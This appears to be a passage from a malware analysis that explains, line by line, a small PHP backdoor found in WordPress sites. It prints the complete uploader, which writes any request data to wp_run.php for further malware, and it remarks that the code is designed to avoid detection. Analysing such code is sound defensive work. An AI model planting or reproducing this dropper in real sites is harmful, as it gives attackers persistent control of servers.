$data = $_REQUEST["data"];

$_REQUEST is always a better function to use than $_GET or $_POST as it does not limit itself to GET or POST but can rather accept either type of HTTP request.

It gives more versatility, and it seems to be less detected than using $_GET or $_POST to capture the data that will be uploaded.

file_put_contents("wp_run.php", $data);

Once the attacker has submitted their data through a HTTP request to the wp_uploader.php file, then file_put_contents handles the rest by creating a file named wp_run.php with the uploaded data (usually more PHP malware).

Finally echo prints out a nice “status: ok” message to let the attacker know it is complete.

echo "status: ok";

<?php
$data = $_REQUEST["data"];
file_put_contents("wp_run.php", $data);
echo "status: ok";
?>